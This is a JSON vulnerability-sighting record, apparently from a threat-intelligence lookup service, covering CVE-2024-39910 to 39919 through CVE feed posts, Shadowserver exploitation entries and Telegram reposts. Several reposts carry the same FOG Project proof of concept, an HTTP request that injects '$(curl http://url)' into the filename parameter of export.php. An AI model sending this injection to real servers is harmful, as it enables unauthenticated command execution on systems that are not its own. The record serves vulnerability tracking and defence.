{"vulnerability": "CVE-2024-3991", "sightings": [{"uuid": "6e3a3e18-89a1-4d1b-bb6a-2c51060ab9f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-14)", "content": "", "creation_timestamp": "2026-02-14T00:00:00.000000Z"}, {"uuid": "1fc89e77-601a-461b-91b3-42e12526f0cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9542", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aFOG Project CVE-2024-39914 \u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\nURL\uff1ahttps://github.com/9874621368/FOG-Project\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-12-21T08:31:52.000000Z"}, {"uuid": "edcda892-5d71-461e-8bf2-f1a26a57c476", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "Telegram/h1_LAWym1OOJC74U1dEhhZt9xiPrPSKNY3U7mPMWdbLETg", "content": "", "creation_timestamp": "2024-09-21T16:07:02.000000Z"}, {"uuid": "c2d889fb-1f3c-477b-86e7-faf451032651", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "Telegram/bnboRDeRN7IU096wLrYLWa4VlIpVRHhLuXL8TpL8JVJFXQ", "content": "", "creation_timestamp": "2024-07-24T07:42:04.000000Z"}, {"uuid": "b7cef5d3-02c3-4f9a-8f32-54057e9f84d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39917", "type": "seen", "source": "https://t.me/cvedetector/780", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-39917 - xrdp is an open source RDP server. xrdp versions p\", \n  \"Content\": \"CVE ID : CVE-2024-39917 \nPublished : July 12, 2024, 4:15 p.m. | 43\u00a0minutes ago \nDescription : xrdp is an open source RDP server. xrdp versions prior to 0.10.0 have a vulnerability that allows attackers to make an infinite number of login attempts. The number of max login attempts is supposed to be  limited by a configuration parameter `MaxLoginRetry` in `/etc/xrdp/sesman.ini`. However, this mechanism was not effectively working. As a result, xrdp allows an infinite number of login attempts. \nSeverity: 7.2 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"12 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-12T19:27:11.000000Z"}, {"uuid": "49e70e13-417c-49c3-9399-c351dbf836db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39916", "type": "seen", "source": "https://t.me/cvedetector/761", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-39916 - FOG is a free open-source cloning/imaging/rescue s\", \n  \"Content\": \"CVE ID : CVE-2024-39916 \nPublished : July 12, 2024, 3:15 p.m. | 20\u00a0minutes ago \nDescription : FOG is a free open-source cloning/imaging/rescue suite/inventory management system. There is a security issue with the NFS configuration in /etc/exports generated by the installer that allows an attacker to modify files outside the export in the default installation. The exports have the no_subtree_check option. The no_subtree_check option means that if a client performs a file operation, the server will only check if the requested file is on the correct filesystem, not if it is in the correct directory. This enables modifying files in /images, accessing other files on the same filesystem, and accessing files on other filesystems. This vulnerability is fixed in 1.5.10.30. \nSeverity: 6.4 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"12 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-12T17:46:34.000000Z"}, {"uuid": "e161fe56-6ccf-4290-87cf-02a75a4bb0a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "seen", "source": "https://t.me/cvedetector/760", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-39914 - FOG is a cloning/imaging/rescue suite/inventory ma\", \n  \"Content\": \"CVE ID : CVE-2024-39914 \nPublished : July 12, 2024, 3:15 p.m. | 20\u00a0minutes ago \nDescription : FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php. This vulnerability is fixed in 1.5.10.34. \nSeverity: 9.8 | CRITICAL \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"12 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-12T17:46:33.000000Z"}, {"uuid": "526afad4-0024-4320-b579-cc3b3c83d9a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39911", "type": "seen", "source": "https://t.me/cvedetector/1154", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-39911 - 1Panel SQL Injection\", \n  \"Content\": \"CVE ID : CVE-2024-39911 \nPublished : July 18, 2024, 4:15 p.m. | 39\u00a0minutes ago \nDescription : 1Panel is a web-based linux server management control panel. 1Panel contains an unspecified sql injection via User-Agent handling. This issue has been addressed in version 1.10.12-lts. Users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 10.0 | CRITICAL \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"18 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-18T19:18:03.000000Z"}, {"uuid": "cb77f22e-74e0-4fef-90b8-41579d6bcd36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39912", "type": "seen", "source": "https://t.me/cvedetector/907", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-39912 - Webauthn-lib Username Enumeration Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-39912 \nPublished : July 15, 2024, 8:15 p.m. | 22\u00a0minutes ago \nDescription : web-auth/webauthn-lib is an open source set of PHP libraries and a Symfony bundle to allow developers to integrate that authentication mechanism into their web applications. The ProfileBasedRequestOptionsBuilder method returns allowedCredentials without any credentials if no username was found. When WebAuthn is used as the first or only authentication method, an attacker can enumerate usernames based on the absence of the `allowedCredentials` property in the assertion options response. This allows enumeration of valid or invalid usernames. By knowing which usernames are valid, attackers can focus their efforts on a smaller set of potential targets, increasing the efficiency and likelihood of successful attacks. This issue has been addressed in version 4.9.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 5.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"15 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-15T22:42:34.000000Z"}, {"uuid": "41193c65-a0c0-4da5-9d2e-0937a54f72c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39915", "type": "seen", "source": "https://t.me/cvedetector/905", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-39915 - Thruk Authenticated Remote Code Execution (RCE) Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-39915 \nPublished : July 15, 2024, 8:15 p.m. | 22\u00a0minutes ago \nDescription : Thruk is a multibackend monitoring webinterface for Naemon, Nagios, Icinga and Shinken using the Livestatus API. This authenticated RCE in Thruk allows authorized users with network access to inject arbitrary commands via the URL parameter during PDF report generation. The Thruk web application does not properly process the url parameter when generating a PDF report. An authorized attacker with access to the reporting functionality could inject arbitrary commands that would be executed when the script /script/html2pdf.sh is called. The vulnerability can be exploited by an authorized user with network access. This issue has been addressed in version 3.16. Users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 9.9 | CRITICAL \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"15 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-15T22:42:32.000000Z"}, {"uuid": "ac84ef7f-bdab-4bbc-8300-6b63114e86bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39919", "type": "seen", "source": "https://t.me/cvedetector/904", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-39919 - Playwright URL-to-PNG Local Host Capture Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-39919 \nPublished : July 15, 2024, 8:15 p.m. | 22\u00a0minutes ago \nDescription : @jmondi/url-to-png is an open source URL to PNG utility featuring parallel rendering using Playwright for screenshots and with storage caching via Local, S3, or CouchDB. The package includes an `ALLOW_LIST` where the host can specify which services the user is permitted to capture screenshots of. By default, capturing screenshots of web services running on localhost, 127.0.0.1, or the [::] is allowed. If someone hosts this project on a server, users could then capture screenshots of other web services running locally. This issue has been addressed in version 2.1.1 with the addition of a blocklist. Users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 3.1 | LOW \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"15 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-15T22:42:28.000000Z"}, {"uuid": "3f26358b-e1e3-457c-8d35-ceb218c95081", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/413", "content": "", "creation_timestamp": "2024-09-21T20:25:51.000000Z"}, {"uuid": "5973d82e-d7eb-4e96-9588-1bb88695d83c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/14716", "content": "FOG Project CVE-2024-39914\n\nPOST /fog/management/export.php?filename=$(curl+http://url)&type=pdf HTTP/1.1\nHost: 127.0.0.1\n\nfogguiuser=fog&nojson=2\n\n\n\uff08curl+http://url\uff09\n\n#exploit #poc", "creation_timestamp": "2024-07-24T05:57:11.000000Z"}, {"uuid": "de9f8a70-6604-43c4-b8b7-0e7e66bbd746", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/2038", "content": "", "creation_timestamp": "2024-09-21T16:06:46.000000Z"}, {"uuid": "5fe17a9b-6b63-4b57-864a-5dfd2f16aed9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1419", "content": "FOG Project CVE-2024-39914\n\nPOST /fog/management/export.php?filename=$(curl+http://url)&type=pdf HTTP/1.1\nHost: 127.0.0.1\n\nfogguiuser=fog&nojson=2\n\n\n\uff08curl+http://url\uff09\n\n#exploit #poc", "creation_timestamp": "2024-07-24T05:57:11.000000Z"}, {"uuid": "c1215270-b600-490e-8b20-5634c09cae77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39911", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/7038", "content": "\u200a1Panel Users Urged to Patch After Critical SQLi Flaws (CVE-2024-39911, CVSS 10) Discovered\n\nhttps://securityonline.info/1panel-users-urged-to-patch-after-critical-sqli-flaws-cve-2024-39911-cvss-10-discovered/", "creation_timestamp": "2024-07-23T10:41:56.000000Z"}, {"uuid": "1b5aad7e-00b7-41dc-bc32-8d6e08350faf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-26)", "content": "", "creation_timestamp": "2025-06-26T00:00:00.000000Z"}, {"uuid": "dd5e940c-4273-469b-b6de-af921f1aad09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-10)", "content": "", "creation_timestamp": "2025-11-10T00:00:00.000000Z"}, {"uuid": "1d56f79f-0773-4b0b-a5fe-0c6c13747796", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39915", "type": "seen", "source": "https://t.me/Black4Fan/10", "content": "\u0410 \u0435\u0449\u0435 \u044f \u043d\u0430\u043b\u0443\u0442\u0430\u043b \u043f\u0430\u0447\u043a\u0443 CVE.\n\u041f\u0440\u0430\u0432\u0434\u0430 \u0447\u0430\u0441\u0442\u044c \u0438\u0437 \u043d\u0438\u0445 \u0431\u0435\u0437 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u044f \u0430\u0432\u0442\u043e\u0440\u0430 \u00af\\_(\u30c4)_/\u00af\n\nOracle E-Business Suite\nCVE-2024-21071 RCE\nCVE-2024-21074 SQL Injection\nCVE-2024-21075 SQL Injection\nCVE-2024-21080 SQL Injection\nCVE-2024-21143 Unvalidated Forward\n\nOracle Critical Patch Update - April 2024\nOracle Critical Patch Update - July 2024\n\n\nXibo CMS\nCVE-2024-41802 SQL Injection\nCVE-2024-41803 SQL Injection\nCVE-2024-41804 SQL Injection\nCVE-2024-41944 SQL Injection\n\nXibo CMS Security Advisory\n\n\nThruk\nCVE-2024-39915 RCE\n\nThruk Security", "creation_timestamp": "2024-08-13T15:58:56.000000Z"}, {"uuid": "911717d7-6e1a-4fcd-b122-fc600591fffd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "https://t.me/information_security_channel/53766", "content": "CVE-2024-39914 \u2013 Unauthenticated Command Injection in FOG Project\u2019s export.php\nhttps://www.offsec.com/blog/cve-2024-39914/\n\nDiscover details about CVE-2024-39914, a critical unauthenticated command injection vulnerability in FOG Project \u2264 1.5.10.34. Learn how attackers can exploit export.php to execute system commands or deploy persistent webshells.\nThe post CVE-2024-39914 \u2013 Unauthenticated Command Injection in FOG Project\u2019s export.php (https://www.offsec.com/blog/cve-2024-39914/) appeared first on OffSec (https://www.offsec.com/).", "creation_timestamp": "2025-06-26T17:12:35.000000Z"}, {"uuid": "e2024d4c-499f-48fe-aeea-4a08b7272e8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39918", "type": "seen", "source": "https://t.me/cvedetector/902", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-39918 - \"jmondi/url-to-png Path Traversal Vulnerability\"\", \n  \"Content\": \"CVE ID : CVE-2024-39918 \nPublished : July 15, 2024, 8:15 p.m. | 22\u00a0minutes ago \nDescription : @jmondi/url-to-png is an open source URL to PNG utility featuring parallel rendering using Playwright for screenshots and with storage caching via Local, S3, or CouchDB. Input of the `ImageId` in the code is not sanitized and may lead to path traversal. This allows an attacker to store an image in an arbitrary location that the server has permission to access. This issue has been addressed in version 2.1.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 4.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"15 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-15T22:42:26.000000Z"}, {"uuid": "400968d3-b97e-4cbf-b35a-c6e023276a9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2832", "content": "FOG Project CVE-2024-39914\n\nPOST /fog/management/export.php?filename=$(curl+http://url)&type=pdf HTTP/1.1\nHost: 127.0.0.1\n\nfogguiuser=fog&nojson=2\n\n\n\uff08curl+http://url\uff09\n\n#exploit #poc", "creation_timestamp": "2024-07-23T17:04:26.000000Z"}, {"uuid": "11a1f9f5-0c1e-4d02-bdb0-945912fdb2e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "https://t.me/BackupLulz/243", "content": "", "creation_timestamp": "2024-11-03T04:41:27.000000Z"}, {"uuid": "237c525e-c707-40e4-8b18-d908e7808119", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-01)", "content": "", "creation_timestamp": "2025-02-01T00:00:00.000000Z"}, {"uuid": "11a32279-d677-47ef-9a58-8ea5c4565b15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-05)", "content": "", "creation_timestamp": "2025-10-05T00:00:00.000000Z"}, {"uuid": "3d698634-ac59-426c-a109-861e09127197", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39910", "type": "seen", "source": "https://t.me/cvedetector/5757", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-39910 - Decidim QuillJS Cross-Site Scripting (XSS) Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-39910 \nPublished : Sept. 16, 2024, 7:16 p.m. | 39\u00a0minutes ago \nDescription : decidim is a Free Open-Source participatory democracy, citizen participation and open government for cities and organizations. The WYSWYG editor QuillJS is subject to potential XSS attach in case the attacker manages to modify the HTML before being uploaded to the server. The attacker is able to change e.g. to  if they know how to craft these requests themselves. This issue has been addressed in release version 0.27.7. All users are advised to upgrade. Users unable to upgrade should review the user accounts that have access to the admin panel (i.e. general Administrators, and participatory space's Administrators) and remove access to them if they don't need it. Disable the \"Enable rich text editor for participants\" setting in the admin dashboard \nSeverity: 5.4 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"16 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-16T22:03:11.000000Z"}, {"uuid": "ccb6ef5b-735a-4d6f-b8f1-f7f82d39a43b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "https://t.me/Kelvinseccommunity/565", "content": "FOG Project CVE-2024-39914\n\nPOST /fog/management/export.php?filename=$(curl+http://url)&type=pdf HTTP/1.1\nHost: 127.0.0.1\n\nfogguiuser=fog&nojson=2\n\n\n\uff08curl+http://url\uff09\n\n#exploit #poc", "creation_timestamp": "2024-07-23T18:38:23.000000Z"}, {"uuid": "5eab17b7-5e0d-464f-95f8-19df28b594ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/18821", "content": "", "creation_timestamp": "2024-09-21T16:06:46.000000Z"}]}